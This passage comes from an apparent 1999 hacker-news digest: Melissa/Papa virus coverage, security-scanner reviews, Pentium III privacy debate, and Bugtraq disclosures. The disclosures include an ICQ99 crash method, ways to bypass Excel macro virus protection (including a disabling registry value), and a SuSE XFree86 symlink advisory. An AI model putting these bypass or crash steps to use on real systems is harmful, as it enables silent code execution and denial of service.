"The vast majority of viruses are not ever deployed or released," said Carey Nachenberg, chief researcher at Symantec's anti-virus research center. Although the source code for many viruses is easy to get, making copying them relatively simple, the ramifications of sending out a virus as destructive as Melissa discourages many hackers from doing so. The FBI has launched a widespread search for Melissa's creator, whom officials said could face as many as 10 years in jail and $350,000 in fines. Meanwhile, anti-virus researchers also are learning new details of the so-called Papa virus, a Melissa variant that is carried by Excel documents and sends out 60 e-mails when opened. Virus warrior a target The virus contains the subject line "Fwd: Workbook from all.net and Fred Cohen" and a body reading "Urgent info inside. Disregard macro warning." The Papa virus first surfaced Monday, but after studying it, researchers found a glitch that kept it from working, rendering it "sterile." But Tuesday, someone apparently had fixed that glitch, and the newer, virulent strain of virus -- "Papa B" -- was reportedly on the loose. Anti-virus software maker Network Associates said it's had reports of Papa B hitting at least one Fortune 100 company and two large firms in Europe. When opened, the virus also pings -- or, repeatedly hits -- two Web sites, one run by anti-virus expert Fred Cohen, the subject of the virus message, and @Home. Cohen suspects a group of hackers created the virus to target him because he fingered them in another virus, which was called Caligula. "They have made threats over the last several weeks," Cohen said. Just say 'no' To protect himself from such attacks, Cohen said he simply says "no" to any attachment that comes his way. Still, he believes that Microsoft Corp. cuts too many security corners in Windows, oversights that could lead to more breaches. The Melissa virus and its variants have been carried through Microsoft documents. "We are building a house of cards and it is going to be blown down every so often," he said. ZDNN's Rob Lemos contributed to this story @HWA 12.3 Is Microsoft to blame for the Melissa virus and variants? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.latimes.com/HOME/BUSINESS/t000028532.1.html MARCH 30, 1999 . . . 10:40 EST Melissa virus stows away aboard Navy ship BY BOB BREWIN (antenna@fcw.com) ABOARD THE USS BLUE RIDGE -- The wildly proliferating computer virus "Melissa," which has infected e-mail servers across government and the private sector, has made its way to e-mail accounts on this command ship of the U.S. 7th Fleet, operating 20 miles of the coast of Guam in the western Pacific Ocean. The Melissa macrovirus, which began hitting systems last week, comes in the form of an e-mail attachment. While the virus does no harm to an organization's data or software, it can slow down and eventually crash the e-mail server. The virus propagates itself by using a PC user's e-mail address book to forward itself to other users. But, thanks to a timely alert from the Navy's Fleet Information Warfare Center (FIWC), the Blue Ridge managed to stop Melissa before its spread, according to Cmdr. Michael Felmly, assistant chief of staff for command, control, communications, computers and intelligence for the 7th Fleet. "We got a heads up on what to do and what not do to do" last weekend from FIWC via the Navy's Pacific Region Network Operations center in Hawaii, Felmly said. The center supports the Blue Ridge and the eight 7th Fleet ships participating in the semiannual Tandem Thrust exercise. The information technology staff identified three e-mails that had the virus and isolated them before they spread throughout the ship's unclassified local-area network, which hosts 1,600 e-mail accounts, said Dennis Kaida, a network and systems engineer from the Navy's Space and Naval Warfare Systems Command and who is temporarily assigned to the Blue Ridge for Tandem Thrust. Kaida said that by the time the 7th Fleet network staff had isolated the e-mails containing the virus, the network crew had gone to the Symantec Corp. home page and downloaded Norton AntiVirus software that works against the Melissa virus. Vice Adm. Walter Doran, commander of the 7th Fleet, said that the ability of the Melissa virus to make its way to this ship -- the showcase of the networked Navy with a high-speed fiber-optic backbone and multiple satellite links to the outside world -- highlighted the downside of such connectivity. In the not-so-distant past, Doran said, "when you went to sea, you took off the lines" and lost most connections to the world "except for a squawky radio." But, thanks to the high speed network and satellite connections, Doran said, "we are very much connected even at sea." In fact, shortly after concluding the Melissa battle, the ship's staff had to gear up to fight off the similar "Papa" virus, which attacks Microsoft Corp. Excel spreadsheets. MARCH 30, 1999 . . . 13:50 EST 12.4a Melissa takes down Marine Corps e-mail ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ BY DANIEL VERTON (dan_verton@fcw.com) http://www.fcw.com:80/pubs/fcw/1999/0329/web-usmc-3-30-99.html link The fast-spreading e-mail virus "Melissa" has forced the Marine Corps to shut down its base-to-base e-mail communications at least until tomorrow, a spokeswoman for the Marines confirmed today. According to the spokeswoman, the Marines are able to communicate internally within each base, but all base-to-base e-mail connectivity has been shut down until network administrators feel comfortable that they have taken the appropriate security measures to protect against the virus. Other Internet connections between bases has not been affected. A spokeswoman for the Defense Department's Joint Task Force for Computer Network Defense said the Army and the Air Force took their servicewide servers down over the weekend to purge them of any messages that might contain the Melissa macrovirus. Melissa began infecting systems across the country late last week and comes in the form of an e-mail attachment. While the virus does no harm to an organization's data or software, it can slow down and eventually crash the e-mail server. The virus propagates itself by using a PC user's e-mail address book to forward itself to other users. @HWA 12.5 Melissa virus creator apprehended ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS net-security.org MELISSA CREATOR APPREHENDED by BHZ, Friday 2nd Apr 1999 on 7.29 pm CET Melissa, famed Macro virus, that infected 100,000 computers in 3 days is still very active in cyberspace. Many mutated viruses are created, and not just for MS Word, but for MS Excel (x97/Papa.b - created as a personal vendetta to Fred Cohen, who fingered one group for creating famous Caligula virus that steals PGP keys). According to today's post to alt.comp.virus, Melissa's creator was caught. David L. Smith, 30, of Aberdeen, was arrested Thursday night at his brother's house in nearby Eatontown, said Rita Malley, a spokeswoman for Attorney General Peter Verniero. 13.0 [ISN] A hacker's worst nightmare ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the ISN mailing list... http://www.zdnet.com/pccomp/stories/all/0,6605,392297,00.html PRODUCT REVIEWS A Hacker's Worst Nightmare Christopher Null March 10, 1999 Stop Internet intruders in their tracks You don't really want to share your customers' credit card numbers with every hacker on the Internet, do you? If your network is connected to the Internet and protected only by a firewall, you might be leaving your business--and your customers' accounts--wide open to data pirates. A firewall is good first line of defense, but it's probably not enough to keep out persistent intruders. We tested three new antihacker tools and found a wide range of useful and not-so-useful utilities that help you plug the holes on your network. Internet Security Systems Internet Scanner 5.6 is an exhaustive utility that simulates more than 450 types of network attacks, then presents comprehensive reports about the state of your network. Internet Scanner is a mainstay with security experts, but it's also deceptively simple to master. Internet Scanner predefines several attack simulation packages--typically called scans--ranging from simple scans to special scans for testing router security. The simulated attacks are varied, including Windows NT- specific attacks, mail server vulnerability checks, and denial-of-service attacks (such as the Ping of Death). With all these tests, you'd think Internet Scanner would have to run overnight to get results. Not so. A complete scan with all tests on two systems took only 11 minutes to run. Internet Scanner's new SmartScan feature keeps track of the results each time you run it and uses that information to intelligently poke holes in your network, much like a hacker who keeps track of previous successes and failures. Altogether, it's the brainiest way to examine your network security. Heal Thyself Netect's HackerShield 1.1 is a relative newcomer to the security scene, and it's still growing up. HackerShield strives to be a comprehensive network analysis tool, but it falls far short in scope and power. The product contains roughly 250 checks, substantially fewer than the competition. And every time we tried running a full-network scan, it froze in midtest because of its own denial-of-service attacks. We never did get complete results, but with 120 checks activated, it took a long 25 minutes to scan two systems. HackerShield does have its pluses. Its RapidFire updates are periodically available on Netect's Web site, and downloading them expands the number of attacks HackerShield simulates (about 50 are available each month). HackerShield also automatically fixes some problems, whereas with Internet Scanner you have to patch all the holes yourself. For example, both tools will find that your server allows an administrator password, but only HackerShield will fix it for you. Unfortunately, the autofix option worked on only 15 percent of the problems we unearthed in our tests. Rich Man's Expert Say you've patched all the holes you can, but you still want to estimate the damage should a hacker make it through and abscond with valuable trade secrets. L3 Network Security provides the solution in Expert 3.0, a sophisticated network mapping and risk analysis system. Unlike the other two products, Expert 3.0 doesn't actually test the security on your network. Instead, you build a network map yourself (Expert automates much of this process) and define the threats from outside--and inside--the organization. Expert then provides detailed, customized reports about threat and risk levels. Expert works hand-in-hand with your antihacker software and firewall to help you plan for the worst contingency, but its $9,500 price is steep. Even though this includes two days of offsite training, you'll likely find you have more affordable ways to map your network (with Visio) and crunch numbers (with Excel). Internet Scanner 5.6 Rating: Four Stars Verdict: The most comprehensive security package on the market. Pros: Exhaustive feature set; fast. Cons: Pricey; cryptic descriptions. Starting at $2,795 est. street price / Internet Security Systems / (678) 443-6000 Expert 3.0 Rating: Three Stars Verdict: A fancy way to map your network and analyze its risks. Pros: Makes risk analysis simple. Cons: Expensive for the features. $9,500 est. street price / L3 Network Security / (888) 280-7475 HackerShield 1.1 Rating: Two Stars Verdict: The antihacker tool with lots of hand-holding. Pros: Automatically fixes some holes. Cons: Slow; not comprehensive. $695 per server est. street price / Netect /(888) 263-8328 -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 13.1 How bad is Pentium III privacy threat? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From C|Net news Pentium III: How bad is privacy threat? By Stephanie Miles Staff Writer, CNET News.com NEWS.COM March 26, 1999, 11:45 a.m. PT URL: http://www.news.com/SpecialFeatures/0,5,34300,00.html news analysis Do the serial numbers on Intel's computer chips really present a major threat to consumer privacy? Technology experts say recent reports of software programs capable of "grabbing" PC users' Pentium III serial numbers without their knowledge or consent shouldn't alarm PC users. On the other hand, those on all sides of the debate agree that no one should be overly confident about the level of security these microprocessors can ensure. Nathan Brookwood, an analyst at Insight 64, reflects that conflict. "I'm not a good person at anticipating all the evil things people can do. But in my view, the whole role of the PSN [processor serial number] has been somewhat overstated," he said. Yet he was quick to add: "When you have a transaction and a user at one end of the network and a machine where the transaction is being handled at the other end, and a big network in between, there are lots of ways to compromise a machine or break into a site." Even privacy advocates concede that it is technically difficult for a hacker to do much harm if armed only with a purloined processor serial number. But these groups are concerned that future technologies and uses of the Internet could allow grave abuse of this information in ways not envisioned today. Regardless of the actual risk, the debate has become something of a battle royal between privacy advocates and corporate interests. The emotions arising from the issue seem to transcend the mundane machinations of digital technology, introducing Orwellian rhetoric often reserved for such constitutional powder kegs as gun control. "Individuals should be able to control their identity and other forms of authentication," said Ari Schwartz, senior policy analyst for the Center for Democracy and Technology, which has filed a complaint with the Federal Trade Commission, requesting that Intel be precluded from manufacturing the Pentium III with the serial code. Intel's recently released Pentium III processor contains a 96-bit serial number hardwired into the chip. The number was designed to add another layer of protection for e-commerce transactions and to aid organizations in tracking assets. Independent chip analysts say the framework in which the serial number will be exchanged makes it difficult for any third party to use a nabbed number nefariously. These experts acknowledge that hackers or marketers will be able to steal it--but a number is likely all they will get, they say, not the key to your life. "All they have at that point is a serial number, and that doesn't really help a lot," said Peter Glaskowsky, an analyst at MicroDesign Resources. To take advantage of someone, he added, "you need a combination of an unethical Web site developer and a stupid Web site developer." At the same time, Glaskowsky said, the serial number offers little in the way of added security. And companies looking for better ways to manage technology across large networks are not sold on the Pentium III either. "Asset management now is not done easily--it's either done physically or through personnel," said Pete Jackson, president of Intraware, a systems integration firm. "It's a major problem throughout the enterprise, but I don't think a lot of people are going to switch to the Pentium III to solve the problem." Security concerns have dogged the high-tech industry relentlessly, particular with the wild proliferation of Internet use. On the software side, Microsoft has faced its own share of privacy issues, acknowledging earlier this month that Windows 98 collects information on users PCs through the Windows 98 registration process and that documents created with Office 97 applications include information related to document authors. Microsoft halted the practice and issued patches for the security holes. Against this backdrop, it comes as not surprise that the Pentium III serial number has enjoyed a short but tortured life. Intel revealed the serial number system in February, stating that the number was a third form of identification. In Intel's view, those who want to gain access to number-protected sites will provide their user names and passwords, as well as let distant Web servers send down an applet to confirm the processor serial numbers, said Pat Gelsinger, corporate vice president at Intel. Although the serial number never changes, the confirming applet "hashes" it so that sites only get a placebo of the real number--and no two Web sites get the same placebo. In other words, if your processor serial number is X, one Web site will know you as Y, while another might know you as Z. Another layer of encryption disguises Y or Z for the confirming transaction. During the exchange, processor numbers are further disguised to minimize the possibility that the true serial number will be intercepted. Therein lies the problem to privacy advocates, who note that this encryption technology is an option for Web sites but that there is no guarantee that all of them will use it. "We're not confident about [widespread encryption], no," Schwartz said, understatedly. Turning it back "on" The plan was to have computer makers leave the serial number "on," or accessible and open to confirming software agents. After privacy groups protested, Intel changed the software utility so that the PSN would be disabled by default shortly after a PC boots up. Even before the chip was available in computers, a German technology magazine claimed that it had developed a method of circumventing the Intel-developed software utility. A Canadian software firm Zero-Knowledge Systems then followed with an ActiveX control which grabs the serial number before the software utility is activated, and after tricking a user into restarting their system. But while these groups may have succeeded if their intent was embarrassing the world's largest chipmaker, analysts say that a stolen serial code does not present much of an actual threat to a typical Pentium III user. Even if the disabling utility is cracked, it would still be extremely difficult to do anything with the serial number, analysts maintain. For instance, if a hacker wanted to get into private accounts, they would likely need more information, they say. Most Web sites, especially e-commerce sites, which use the Processor Serial Number, require other forms of identity verification, not only to reassure visitors, but also to protect their own interests, Glaskowsky said. "Any Web site that is intelligent is going to ask you for some kind of password," he said. "It's inevitable that responsible online businesses will have a two-stage verification process. One of those might be the serial number." Many hacks required Pulling this off is no small feat either, technologically speaking. A hacker couldn't just issue the PSN to a distant server. The hashed number through which the distant server knows the user would have to be determined, which involves breaking into the distant server's database as well. Then, even if that number could be determined, the additional layer of encryption would have to be hacked so that the hacker can send a confirming transactional number that the distant server will accept. "It's extremely difficult to [use the serial number] to impersonate another person--not impossible, but difficult," Glaskowsky explained. "It's far more straightforward for a Web site operator to steal your serial number than for a hacker to trick them." The pervasiveness of the encryption layer dents the other theory of danger: unscrupulous sharing. Although there may be a financial incentive for Web sites to sell or share this number with other sites, there is no way to connect the encrypted number to an individual user, according to George Alfs, an Intel spokesman. "It can't be compared to other Web site serial numbers," he said. "If sites are using the tamper-resistant tools, the numbers won't match." Assurances fall on deaf ears Many users, though realistic about the risks of using the Internet, are not assuaged by analyst and Intel reassurances. Web sites "knowing who you are...is pretty much available through many sources, so don't sweat the small stuff," wrote reader Randy Dickson, who raised concerns about serial number thieves impersonating PC users in chat rooms and newsgroups. "While I think Intel had their heart in the right place, they seriously misunderstood how this information could be misused...Some of us don't mind the fact that Big Brother may be watching, as long as he can't be misled," Dickson wrote. Others, like Norman Thorsen, are more concerned about Web sites gathering yet more personal information about visitors, regardless of whether these sites then sell or share the data. "Given this opportunity, marketers and, quite possibly government agencies, will collect as much information as possible," Thorsen wrote. "No one asked the customer about collecting this information--Intel decided to provide it without prior notification. By definition, that is an invasion of privacy." Dickson and other readers are concerned about Web sites that will only allow surfers to visit if the personal serial number is enabled. "Web sites will develop content that requires the PSN, so that personal privacy must be compromised in order to use the Internet," one reader wrote. "Intel's technology is fundamentally un-American. It is equivalent to installing video cameras on every street corner." Many companies include serial numbers with their products, including software and hard drive manufacturers but do not share or sell that type of customer information. This is not necessarily out of any noble respect for the privacy of its customers, but because it would be against their own strategic interests, said Greg Blatnik, vice president of Zona Research. "That type of information tends to have more value to the company that provided the product," Blatnik said, adding that many companies use customer lists generated with the help of serial numbers to sell more products. "Companies guard that information fiercely." Privacy advocates concede many of these points. What has them mostly worried is the future. Future shock? "What's the damage that could be done from a hacker grabbing your PSN? Not much right now," said Jason Catlett, president of Junkbusters, an advocacy group supporting a boycott of Intel until the company removes the serial number, in an email interview. "But if Intel's plans of turning the PSN into an e-commerce identifier pan out in the next few years, it will be used for theft of identity." Catlett predicts it will be several years before the total privacy implications of the serial code are known. And by that time, he fears, such serial codes will likely have become a de facto standard in identity authentication. "Every time you move forward with technology, this happens," Brookwood said. "Before they created credit cards, there was no credit card fraud." @HWA 14.0 ICQ99 Bug, erh feature turns your icq into a DoSable web server.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Mon, 29 Mar 1999 01:07:18 -0500 From: Ronald A. Jarrell To: BUGTRAQ@netspace.org Subject: icq DOS / possible "stupid user" vulnerability. Ok, I was a bit surprised when, in playing with the new ICQ99a build 1700 v2.13 client (which I believe is the first publicly distributed one of the 99 family), I turned on the "Activate my home page" feature, and turned my laptop into a web server... Complete with a file server that allows by default anything in the "program files\icq\homepage\root\YOUR#\files" folder to be requested. Even set up a guest book, chat service, etc... After getting over being astonished (yea, they said "turning this on might increase people's access to your machine, and tell them your ip address" - of course it will. You're setting up a bloody web server you idiots. A bad one at that.) I naturally started doing some poking. Telnet to your port 80, and enter some non http gibberish. I tried "quit" for grins. Blam. Down goes the ICQ client with a GPF. Got someone else to turn theirs on, and sure enough, managed to shoot him down too. I warned Mirabilis about it. Folks at institutions that worry about such things, but let their employees run ICQ might want to be aware that said employees might well be running web servers now and not evening know it. On you ICQ contact list, if they're on it, said users show up with a little house next to their name. -- Ron Jarrell VA Tech Computing Center @HWA 15.0 Russian crackers take out whitehouse.gov? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From wired; http://www.wired.com/news/news/email/explode-infobeat/politics/story/18787.html Did Russians Get Whitehouse.gov? by Declan McCullagh 3:00 a.m. 29.Mar.99.PST WASHINGTON -- The official White House Web site was offline all day Sunday in what appeared to be its most serious outage to date. A Russian online newspaper reported that anti-NATO crackers were responsible, but a source close to whitehouse.gov blamed a hardware failure. The site was down until about 10 a.m. EST Monday. Vistors were unable to connect, although email to and from whitehouse.gov continued to work. "They have a problem that is not related to an external attack," the source said Sunday. The White House is a popular target for cracking attempts, but no content on the site has ever been altered. Dozens of break-in attempts happen every day, the source said. On Sunday, a number of other Web sites found their home pages replaced with identical protests of US and NATO bombing of Yugoslavia. "Russian hackers demand to stop terrorist aggression against Jugoslavia!" said one message on a Web site operated by Orange Coast College in Costa Mesa, California. Another note on the same page: "To Adolf Clinton: FUCK OUT, looser!! Go fucks Monica!" Other sites that boasted the same message included cfmsd.com and darkarmies.com. The Moscow-based Gazeta.Ru online newspaper said Russian crackers had broken into those sites -- and had pulled the plug on whitehouse.gov too. "Russian computer crime authorities, contacted by the newspaper, declared that they would confront these hacking attacks with same severity as they would have done in any other case of unauthorised penetration into computer networks (punishable under section 272 of Russia's Penal Code, 1997). But the authorities went on to stress, that 'no complaint was filed so far from the American side, which would be necessary for us to start any sort of proceedings,'" Anton Nossik, who wrote the article, told Wired News in an email message. Security experts said whitehouse.gov was likely offline for one of three reasons: A compromised router, a hardware failure, or a denial-of-service attack in which the server is overloaded by attackers. Peter Shipley, the chief security architect for KPMG, said there's no easy defense against denial-of-service attacks. Once recognized, however, they can be dealt with within minutes or hours. Shipley also said it was unlikely a hardware failure by itself would bring a site like whitehouse.gov down for a day or more. "You can bring a router back online rather easily," he said. "It's hard to believe a router would keep a site down for 24 hours." PSI.net, which provides the White House's link to the outside world, did not immediately return phone calls late Sunday. Neither did a White House spokesman. @HWA 16.0 New Excel macro virus can bypass protections and execute code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Mon, 29 Mar 1999 12:51:09 -0500 From: rotaiv To: BUGTRAQ@netspace.org Subject: Bypassing Excel Macro Virus Protection -----BEGIN PGP SIGNED MESSAGE----- With the sudden attention macro viruses have received over the weekend, I thought I would share a couple of items I find concerning with Excel macro viruses. In Excel, if you go to "Tools - Options - General" you can check the "Macro Virus Protection" check-box and this should prevent any macro viruses being executed without your knowledge. This is true is most cases but it can be bypassed with several methods. Password Protected Spreadsheets ========================= If a file is password protected, Excel assumes this to be a "trusted" source so it ignores the "Macro Virus Protection" option. This allows any code contained in the document to be executed without the users knowledge. Here is a scenario that should not be to hard to believe: Someone downloads a list of passwords for pornographic sites from alt.sex and types in a disclaimer password such as "I AM AN ADULT". This allows a macro virus can be executed even if the "Macro Virus Option" is checked. The solution is simple. Don't open any password documents from a non trusted source. If you really want to open the file, type in the password then hold down the SHIFT key before you click "OK" on the password dialog box. Holding down the shift key will by-pass any macros and prevent them from being executed. For more details, refer to the following TechNet article: Q176640 - XL: No Macro Virus Warning Appears Opening Protected Workbook Documents in the XLSTART Directory ============================ Any documents saved in the XLSTART directory are considered to be a "trusted" source so once again, the "Macro Virus Protection" is ignored. The solution here is obvious but no so easy to implement. Don't allow any documents (or shortcuts) to be saved in this directory. Remember, many users may have their PERSONAL.XLS file in this directory which contains macros they have supposedly created themselves. The XLSTART directory on my PC is as follows: C:\Program Files\Microsoft Office\Office\XLStart For more details, refer to the following TechNet article: Q180614 - XL: Workbooks in Startup Folder Are Not Scanned for Macros Disabling 'Macro Virus Protection' ========================= With Word, the macro virus protection can be disabled with the following command: Options.VirusProtection = False To my knowledge, there is no such command for Excel. However, this option can be changed with a reg hack that could be initiated from a batch file or from a VBA macro Shell command. On my PC, the "Macro Virus Protection" option is stored as a dword value in the following registry key: [HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel] To enable the virus protection, use: "Options6"=dword:00000008 To disable the virus protection, use: "Options6"=dword:00000000 This may not be exactly the same for every PC as "Options6" controls several options depending on the value of the first four bits. See below for details: bit 0 Show Name part of Chart Tips bit 1 Show Value part of Chart Tips bit 2 Intellimouse Roll action: 0 = scroll, 1= zoom bit 3 Macro Virus Protection bit 4-15 (Reserved) For more details, refer to the following TechNet article: Q169811 - XL97: Using the Policy Editor to Force Macro Virus Protection Conclusion ======== I am sure many people are under the impression that if the "Macro Virus Protection" option is enabled in Excel they are safe from macro viruses. However, if someone felt so inclined, they could easily bypass this protection and execute VBA code without the users knowledge. I have tested all the above examples using Microsoft Office97 Professional with SR2. I found the references in TechNet but I have not searched Microsoft's Web-site to see if there are any patches or hot-fixes for these three items. 'nuff said ... rotaiv -£- -----BEGIN PGP SIGNATURE----- Version: PGP Personal Privacy 6.0.2 iQEVAwUBNv+9FwuGSvRTfa2rAQFFbgf/U5COtVp2xVU73ZuMRYL2QrBW/e4/18BR zUWqsE0nlQNDd+yuHN6Izkmdr30DaQaWHG4/Uxr79etDdWb2co9aUurWNlN/tFls Zog21KeDyuYPZ0PYrPstVjtV4dQlwyVnTzkNQiYFPH+a11Y6O5bKg2ri4nyciwMV he7suRG8HbX13awEjbcga9L/UR843N/Bh32IoaPK2fgsIrE4jFkUkyJtgX+ISYRO UMkTLosLJRpOlDThiy6pSa7aW1Fr7PmqbdeFOSEPFC7DFyJ99YwDSQEPY+hQu+pS U3xlDGrJUj2Ei52r1wrx+ioSGYAWcks0NUPS7Ey5EJoRMEsivfC9Iw== =42/h -----END PGP SIGNATURE----- @HWA 17.0 xfree86 SUSE exploit ~~~~~~~~~~~~~~~~~~~~ Date: Sun, 28 Mar 1999 23:20:58 +0200 From: Marc Heuse To: BUGTRAQ@netspace.org Subject: SuSE Security Announcement - XFree86 -----BEGIN PGP SIGNED MESSAGE----- ______________________________________________________________________________ SuSE Security Announcement Package: xf86-3.3.3-5 Date: Sun Mar 28 12:26:39 CEST 1999 Affected: unix operating systems using xfree86 ______________________________________________________________________________ A security hole was discovered in the package mentioned above. Please update as soon as possible or disable the service if you are using this software on your SuSE Linux installation(s). Other Linux distributions or operating systems might be affected as well, please contact your vendor for information about this issue. Thanks to the people from bugtraq for providing the details of this vulnerability and especially the XFree86 programmers who made a fix ready over the weekend. Please note, that we provide this information on as "as-is" basis only. There is no warranty whatsoever and no liability for any direct, indirect or incidental damage arising from this information or the installation of the update package. ______________________________________________________________________________ 1. Problem Description XFree86 creates a directory in /tmp with the name .X11-unix for the X sockets and sets the directory to mode 1777. If an attacker creates a symlink with that filename and points it to another directory (e.g. /root), the permissions of the target directory is set to 1777. 2. Impact A local attacker may create files with any contents in any directory. 3. Solution Upgrade your XF86. As a temporary fix you can put these commands into /sbin/init.d/boot.local: /bin/rm -rf /tmp/.X11-unix mkdir -p -m 1777 /tmp/.X11-unix ______________________________________________________________________________ Here are the md5 checksums of the upgrade packages, please verify these before installing the new packages: glibc archives (SuSE 6.0): d2bb4132bc487debea45288f8199e1e7 x8514- 5f5b6a53027d54cb9df4cafcb284d720 xagx- 0c651985aa39750ed787df42c9dc49f7 xfbdev- 7353be5812375a350c7499e4bb4f7781 xglint- 88182f0e22ed3f4f564d0f678dc37ffe xi128- 492ddd01dd10dcb83d2cbf5995b7396b xlkit- 5779042312519b30e214d8aa4b9c2313 xmach32- 9fee0e2a4bcf4fbaa91759bc004faf88 xmach64- 338041da9001b5e36c55f9ffa6209613 xmach8- 68124d6e36cc48396aad4e395cb9567b xmono- ea4c0301ee8f33339f5908d82a4b271d xp9k- d219a182a79723b258b28f87bc22ee68 xs3- d8ad0f9b0d57f887cc076e794a749738 xs3v- ff0c37343e5bd30261ab7f05604ea6e7 xsvga- e151bf1ed2d6c9824b2c521dcf2f7141 xvga16- 9099ebe5428098f8ffacd1ab691b5937 xw32- 5627fc4da2eab1f56a9e636374982ede xxprt- libc5 archives (SuSE <= 5.3): cfe392df95404f0a223b8c983ee51ce1 x8514- 4fd3a27e24b6947ef62231cc4b5630dd xagx- 71e1f6bef32e321b997db67d87c3c20a xdevel- 944e63a37139bcaeffcfa85010567d39 xdoc- 0a6a5de750c11bf35b01744319abfd01 xextra- 324a7e56c0a46685fb26b802167d79d5 xf86- a8a337baf2a85195e981eca2eaf3c855 xfbdev- 67a410a1c051eb70fa3e59935b50ec75 xfnt100- 436ce9d44dd875235d5ffd6eb0d5d07c xfntbig- 21ce9773f7782680bd1142c884c5e77b xfntcyr- 0e04aed9a681d142a4a912d365e57471 xfntscl- 12ffe00734e870c0a9a54fe87b13406b xfsetup- 289216e84448c380341f44796e8e1338 xglint- 43b1a9da5447b4ac7eac5d2f1501b313 xi128- 6626e4404dc0d7bc2f88b3b83f8ce136 xlkit- ab461815a023185f6266d9901e92b6b8 xmach32- bf28d6eb8bd8a9a4b37e5fe0b71c4597 xmach64- b07d322b63b4dc1f0810612907caaaa0 xmach8- 7a56420b929cb1b3e8507d9b3b36b287 xman- 494687ca8adbebaf213eee10f4be290c xmono- 1cad4cdd644d4f17f4f936f5c2d95ff6 xp9k- 39683c93132a16f0e79fc414bfb338f1 xs3- 7a2707ff0cb3ee59d3695f01256c1484 xs3v- 5c0d05b4b1a53f039c35623c1669eb0f xshared- cb707a8c22b77478236a81bc58f5edfa xsvga- e1083e3e18f5a5aeb8de1aff93bd9026 xvga16- bb74f0e93121a8747e8c38bf1e0121e0 xw32- 1d38958dd9ac4fbdd1ccef960667ab45 xxprt- ______________________________________________________________________________ You will find the updates on our ftp-Server: SuSE 6.0: ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/XFree86- SuSE <= 5.3: ftp://ftp.suse.com/pub/SuSE-Linux/suse_update/XFree86- Webpage for patches: http://www.suse.de/patches/index.html or try the following web pages for a list of mirrors: http://www.suse.de/ftp.html http://www.suse.com/ftp_new.html ______________________________________________________________________________ SuSE has got two free security mailing list services to which any interested party may subscribe: suse-security@suse.com - unmoderated and for general/linux/SuSE security discussions. All SuSE security announcements are send to this list. suse-security-announce@suse.com - SuSE's announce-only mailing list. Only SuSE's security annoucements are sent to this list. To subscribe, send an email to majordomo@suse.com with the text subscribe suse-security or subscribe suse-security-announce in the body of the message. Or just issue a echo subscribe suse-security | mail majordomo@suse.com or echo subscribe suse-security-announce | mail majordomo@suse.com ______________________________________________________________________________ If you want to report *NEW* security bugs in the SuSE Linux Distribution please send an email to security@suse.de or call our support line. You may use pgp with the public key below to ensure confidentiality. ______________________________________________________________________________ This information is provided freely to everyone interested and may be redistributed provided that it is not altered in any way. Visit http://www.suse.de/security for our pgp finger print. Type Bits/KeyID Date User ID pub 2048/3D25D3D9 1999/03/06 SuSE Security Team - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i mQENAzbhLQQAAAEIAKAkXHe0lWRBXLpn38hMHy03F0I4Sszmoc8aaKJrhfhyMlOA BqvklPLE2f9UrI4Xc860gH79ZREwAgPt0pi6+SleNFLNcNFAuuHMLQOOsaMFatbz JR9i4m/lf6q929YROu5zB48rBAlcfTm+IBbijaEdnqpwGib45wE/Cfy6FAttBHQh 1Kp+r/jPbf1mYAvljUfHKuvbg8t2EIQz/5yGp+n5trn9pElfQO2cRBq8LFpf1l+U P7EKjFmlOq+Gs/fF98/dP3DfniSd78LQPq5vp8RL8nr/o2i7jkAQ33m4f1wOBWd+ cZovrKXYlXiR+Bf7m2hpZo+/sAzhd7LmAD0l09kABRG0JVN1U0UgU2VjdXJpdHkg VGVhbSA8c2VjdXJpdHlAc3VzZS5kZT6JARUDBRA24S1H5Fiyh7HKPEUBAVcOB/9b yHYji1/+4Xc2GhvXK0FSJN0MGgeXgW47yxDL7gmR4mNgjlIOUHZj0PEpVjWepOJ7 tQS3L9oP6cpj1Fj/XxuLbkp5VCQ61hpt54coQAvYrnT9rtWEGN+xmwejT1WmYmDJ xG+EGBXKr+XP69oIUl1E2JO3rXeklulgjqRKos4cdXKgyjWZ7CP9V9daRXDtje63 Om8gwSdU/nCvhdRIWp/Vwbf7Ia8iZr9OJ5YuQl0DBG4qmGDDrvImgPAFkYFzwlqo choXFQ9y0YVCV41DnR+GYhwl2qBd81T8aXhihEGPIgaw3g8gd8B5o6mPVgl+nJqI BkEYGBusiag2pS6qwznZiQEVAwUQNuEtBHey5gA9JdPZAQFtOAf+KVh939b0J94u v/kpg4xs1LthlhquhbHcKNoVTNspugiC3qMPyvSX4XcBr2PC0cVkS4Z9PY9iCfT+ x9WM96g39dAF+le2CCx7XISk9XXJ4ApEy5g4AuK7NYgAJd39PPbERgWnxjxir9g0 Ix30dS30bW39D+3NPU5Ho9TD/B7UDFvYT5AWHl3MGwo3a1RhTs6sfgL7yQ3U+mvq MkTExZb5mfN1FeaYKMopoI4VpzNVeGxQWIz67VjJHVyUlF20ekOz4kWVgsxkc8G2 saqZd6yv2EwqYTi8BDAduweP33KrQc4KDDommQNDOXxaKOeCoESIdM4p7Esdjq1o L0oixF12Cg== =pIeS - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQEVAwUBNv6bd3ey5gA9JdPZAQHwdwf8CCyu3rkMCANYtEozsy6RL9Sgo2hEoTp+ HIcNLnetVAEakLFBE+YaYO/b6P5ZU8ohqQ7Z+LAZkodDbh0+JtKvyWk6ugt+MxnN 